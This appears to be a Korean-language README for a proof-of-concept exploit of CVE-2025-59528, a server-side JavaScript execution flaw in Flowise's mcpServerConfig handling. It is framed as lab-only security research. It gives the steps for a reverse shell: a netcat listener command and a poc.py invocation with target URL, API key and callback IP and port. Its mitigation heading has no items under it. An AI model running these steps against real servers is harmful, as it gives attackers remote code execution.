
CVE-2025-59528의 PoC
격리된 실험실 환경에서 CVE-2025-59528을 연구하기 위한 개념 증명(PoC)입니다.
[!WARNING] 면책 조항
이 프로젝트는 교육 목적, 보안 연구, 그리고 귀하가 소유했거나 명시적 테스트 승인을 받은 시스템 테스트를 위해서만 엄격히 사용해야 합니다.
소유자의 허가 없이 이 PoC를 제3자 서버, 공공 서비스 또는 인프라에 사용하지 마십시오.
저자는 이 프로젝트의 오용으로 인한 손해, 데이터 손실, 서비스 중단 또는 법적 결과에 대해 책임을 지지 않습니다.
이 PoC는 Flowise에서 사용자 제어 mcpServerConfig 처리를 수반하는 취약점인 CVE-2025-59528의 잠재적 영향을 보여줍니다.
특정 조건에서 이 취약점은 공격자가 서버 측 컨텍스트에서 임의의 JavaScript 코드를 실행할 수 있게 허용할 수 있습니다.
테스트 전에 대상 설치의 정확한 버전을 항상 확인하십시오.
requestsPython 종속성을 설치합니다:
pip install requests
셸을 얻으려면 netcat을 실행하세요:
nc -lvnp <YOUR_PORT>
다음과 같이 PoC를 실행합니다:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
| Argument | Description |
|---|---|
-t, --target | Flowise 테스트 인스턴스의 URL |
-o, --api_key | API 키 |
-i, --ip | 테스트 머신의 IP 주소 |
-p, --port | 테스트 환경에서 사용하는 포트 |
테스트는 격리된 가상 또는 실험실 네트워크 내에서 수행해야 합니다.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
의도적으로 취약하게 구성된 Flowise 인스턴스를 공용 인터넷에 직접 노출하지 마십시오.
영향을 받는 버전의 Flowise를 실행 중인 경우:
이 프로젝트를 사용함으로써 귀하는 모든 관련 법률 및 규정을 준수할 책임이 전적으로 귀하에게 있음을 인정하게 됩니다.
이 PoC는 귀하가 소유한 시스템 또는 보안 테스트 수행에 대한 명시적 승인을 받은 시스템에서만 사용하십시오.